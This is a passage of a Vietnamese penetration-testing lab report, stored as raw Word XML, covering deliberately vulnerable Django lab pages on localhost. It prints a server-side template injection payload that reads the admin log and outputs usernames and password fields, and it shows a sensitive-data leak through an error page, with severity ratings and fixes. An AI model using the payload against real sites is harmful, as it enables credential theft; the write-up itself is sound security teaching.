            <wp:effectExtent l="0" t="0" r="0" b="6350"/>
            <wp:docPr id="486893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93223" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId136"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4667490" cy="3746693"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BBD6B88" w14:textId="58BEFEA5" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00EC0F26" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Nhận xét:</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve"> Đoạn code này sử dụng cú pháp </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{{}} và {{% %}}</w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve"> để thực hiện câu truy vấn ở django (một framework phổ biến cho Python để phát triển các ứng dụng web). Vì vậy, ý tưởng tiếp theo là thực hiện code câu truy vấn: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD31394" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D63794" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>{% load log %} {% get_admin_log 10000 as log %} {% for i in log %} {{"\nUser: "}} {{ i.user.get_username }} {{"\nPassword: "}} {{ i.user.password }} {% endfor %}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A2E011" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Trong đó:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B7ADB11" w14:textId="0991086E" w:rsidR="00EC0F26" w:rsidRPr="005E0BD1" w:rsidRDefault="00EC0F26" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{% load log %}:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Đây là một templatetag, được sử dụng để load một module (hay một file template) có tên là </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>”.</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Điều này cho phép sử dụng các template tag và filter được định nghĩa trong module </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC" w:rsidRPr="005E0BD1">
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333314C9" w14:textId="478B02D3" w:rsidR="00EC0F26" w:rsidRPr="005E0BD1" w:rsidRDefault="00EC0F26" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{% get_admin_log 10000 as log %}:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Đây là một template tag tuỳ chỉnh, đã được định nghĩa trong module </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC" w:rsidRPr="005E0BD1">
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t xml:space="preserve">” </w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve">đã được load ở bước trước. Tag này lấy 10,000 bản ghi từ bảng log của admin và lưu chúng vào một biến có tên là </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC" w:rsidRPr="005E0BD1">
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>”.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B1355E" w14:textId="2D1BC46E" w:rsidR="00EC0F26" w:rsidRPr="005E0BD1" w:rsidRDefault="00EC0F26" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{% for i in log %}:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Đây là một vòng lặp template, trong đó mỗi phần tử trong danh sách </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC" w:rsidRPr="005E0BD1">
        <w:t>log</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>”</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> được lặp qua. Mỗi phần tử được lưu trong biến </w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>“i”</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E592287" w14:textId="6A379C9F" w:rsidR="00EC0F26" w:rsidRPr="005E0BD1" w:rsidRDefault="00EC0F26" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{{ i.user.get_username }}:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Đây là một cách để truy cập vào thông tin của một đối tượng liên quan trong Django. Trong trường hợp này, nó truy cập vào trường user của đối tượng log, sau đó gọi phương thức get_username() để lấy tên người dùng.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E648B" w14:textId="43DFD940" w:rsidR="00EC0F26" w:rsidRPr="005E0BD1" w:rsidRDefault="00EC0F26" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{{ i.user.password }}:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Tương tự như trên, đây là cách để truy cập vào trường password của đối tượng user trong mỗi bản ghi log.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DB3F79E" w14:textId="3D861FEC" w:rsidR="00EC0F26" w:rsidRPr="00D63794" w:rsidRDefault="00EC0F26" w:rsidP="00B44E85">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>{% endfor %}:</w:t>
      </w:r>
      <w:r w:rsidRPr="005E0BD1">
        <w:t xml:space="preserve"> Kết thúc vòng lặp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C2F6169" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D63794" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mục đích:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63794">
        <w:t xml:space="preserve"> Đoạn mã trên sử dụng Django template để lấy 10,000 bản ghi từ bảng log của admin, sau đó hiển thị tên người dùng và mật khẩu của mỗi bản ghi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30B8BA1C" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="005E0BD1" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="005E0BD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="39474111" wp14:editId="7D980A48">
            <wp:extent cx="6115050" cy="2347595"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="583466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66904" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId137"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2347595"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="39C88A28" w14:textId="55D9AE95" w:rsidR="00EC0F26" w:rsidRPr="00F11987" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>Kết quả</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> cuối cùng </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>nhận được</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> là</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>user</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> :</w:t>
      </w:r>
      <w:r w:rsidRPr="00F11987">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00F11987">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> và </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r w:rsidRPr="00F11987">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t xml:space="preserve">được ghi ở </w:t>
      </w:r>
      <w:r w:rsidRPr="00F11987">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>trong log</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D68ED08" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="005E0BD1">
        <w:rPr>
          <w:rFonts w:ascii="UTM Viet Sach" w:hAnsi="UTM Viet Sach"/>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="4CCF5594" wp14:editId="4912FE7C">
            <wp:extent cx="6115050" cy="3012440"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="454100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00970" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId138"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="3012440"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5A3735" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00894776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00894776">
        <w:t xml:space="preserve">High (cao) vì </w:t>
      </w:r>
      <w:r>
        <w:t>l</w:t>
      </w:r>
      <w:r w:rsidRPr="00894776">
        <w:t>ỗ hổng này cho phép kẻ tấn công truy cập trái phép vào cơ sở dữ liệu và lấy thông tin nhạy cảm như tên người dùng và mật khẩu, gây rủi ro nghiêm trọng cho bảo mật hệ thống.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2904A3ED" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> Đảm bảo rằng tất cả các giá trị đầu vào từ người dùng được lọc và kiểm tra cẩn thận để ngăn chặn lỗ hổng SSTI (Server-Side Template Injection).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3211935D" w14:textId="37447197" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="65" w:name="_Toc175959227"/>
      <w:bookmarkStart w:id="66" w:name="_Toc182909879"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>03: Sensitive Data Exposure</w:t>
      </w:r>
      <w:bookmarkEnd w:id="65"/>
      <w:bookmarkEnd w:id="66"/>
    </w:p>
    <w:p w14:paraId="440B0982" w14:textId="1887451A" w:rsidR="001035B9" w:rsidRPr="001035B9" w:rsidRDefault="001035B9" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId139" w:history="1">
        <w:r w:rsidRPr="001035B9">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/data_exp_lab</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="2158D148" w14:textId="69AC8BDA" w:rsidR="00F42CDC" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00F42CDC">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Tiêu đề: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>Sensitive Data Exposure</w:t>
      </w:r>
      <w:r w:rsidR="003705F5">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="674F2F93" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Mô tả lỗ hổng: </w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>Trang 500 có thông tin nhạy cảm có thể khai thác.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63E0FD9B" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D63794" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Các bước thực hiện khai thác và bằng chứng: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="496E1007" w14:textId="18BBBC15" w:rsidR="00EC0F26" w:rsidRPr="00F42CDC" w:rsidRDefault="00F42CDC" w:rsidP="00F42CDC">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 1:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00F42CDC">
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:t>ruy cập vào task thì nhận thấy rằng:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E69CBE4" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="005E0BD1">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78B9AE37" wp14:editId="065D65A7">
            <wp:extent cx="6115050" cy="2656205"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="965733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33774" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId140"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2656205"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BBF9A28" w14:textId="3E22AFD5" w:rsidR="00EC0F26" w:rsidRPr="00D63794" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D63794">
        <w:t>Trang này thông báo lỗi và có thể tìm thấy SENSITIVE_DATA hay không</w:t>
      </w:r>
      <w:r w:rsidR="00F42CDC">
        <w:t>?</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63794">
        <w:t xml:space="preserve"> Vì vậy</w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D">
        <w:t xml:space="preserve">, cần </w:t>
      </w:r>
      <w:r w:rsidRPr="00D63794">
        <w:t>thực hiện kiểm tra code trang này.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6089D070" w14:textId="1D2F0291" w:rsidR="00EC0F26" w:rsidRPr="00D63794" w:rsidRDefault="00F42CDC" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">+ </w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00F42CDC">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Bước 2:</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00D63794">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>T</w:t>
      </w:r>
      <w:r w:rsidR="00EC0F26" w:rsidRPr="00D63794">
        <w:t>ập trung kiểm tra code tại ví trí Data</w:t>
      </w:r>
      <w:r>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220E45B6" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="002E18D9">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="481159E9" wp14:editId="5CB319DB">
            <wp:extent cx="6115050" cy="2799715"/>
            <wp:effectExtent l="0" t="0" r="0" b="635"/>
            <wp:docPr id="426737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37182" name=""/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId141"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="6115050" cy="2799715"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="1895159C" w14:textId="53C05059" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D63794">
        <w:t>Kết quả tìm thấy được giá trị của trường SENSITIVE DATA chính là '</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63794">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>FLAGTHATNEEDSTOBEFOUND</w:t>
      </w:r>
      <w:r w:rsidRPr="00D63794">
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A6AC7E2" w14:textId="7A0F22AE" w:rsidR="00EC0F26" w:rsidRPr="00894776" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00894776">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Mức độ ảnh hưởng của lỗ hổng:</w:t>
      </w:r>
      <w:r w:rsidRPr="00894776">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D" w:rsidRPr="000B1A1D">
        <w:t>Medium (t</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1A1D">
        <w:t>rung bình</w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D" w:rsidRPr="000B1A1D">
        <w:t xml:space="preserve">) </w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="000B1A1D">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D" w:rsidRPr="000B1A1D">
        <w:t>High (</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1A1D">
        <w:t>cao</w:t>
      </w:r>
      <w:r w:rsidR="000B1A1D" w:rsidRPr="000B1A1D">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="000B1A1D">
        <w:t xml:space="preserve"> vì với lỗ hổng này, việc lộ thông tin nhạy cảm qua trang lỗi có thể cho phép kẻ tấn công thu thập dữ liệu quan trọng, dẫn đến rủi ro cho bảo mật hệ thống và quyền riêng tư.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D82E425" w14:textId="77777777" w:rsidR="00EC0F26" w:rsidRPr="00D0578E" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:r w:rsidRPr="00D0578E">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Khuyến cáo khắc phục:</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t xml:space="preserve"> Ngăn chặn trang web từ tiết lộ thông tin nhạy cảm ra bên ngoài. Cẩn thận khi xử lý thông tin báo lỗi và đảm bảo rằng không có dữ liệu nhạy cảm nào được tiết lộ thông qua các trang báo lỗi.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01773E61" w14:textId="49F2F532" w:rsidR="00EC0F26" w:rsidRDefault="00EC0F26" w:rsidP="00EC0F26">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:left="432" w:hanging="432"/>
      </w:pPr>
      <w:bookmarkStart w:id="67" w:name="_Toc175959228"/>
      <w:bookmarkStart w:id="68" w:name="_Toc182909880"/>
      <w:r>
        <w:t>B</w:t>
      </w:r>
      <w:r w:rsidRPr="00D0578E">
        <w:t>04: Using Components with Known Vulnerabilities</w:t>
      </w:r>
      <w:bookmarkEnd w:id="67"/>
      <w:bookmarkEnd w:id="68"/>
    </w:p>
    <w:p w14:paraId="275CA412" w14:textId="0B520D3B" w:rsidR="001035B9" w:rsidRDefault="001035B9" w:rsidP="001035B9">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001035B9">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">Truy cập vào: </w:t>
      </w:r>
      <w:hyperlink r:id="rId142" w:history="1">
        <w:r w:rsidRPr="00EF59B8">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>http://localhost:8000/a9_lab2</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="450F89BB" w14:textId="4980B500" w:rsidR="003705F5" w:rsidRPr="003705F5" w:rsidRDefault="003705F5" w:rsidP="003705F5">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009D0400">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
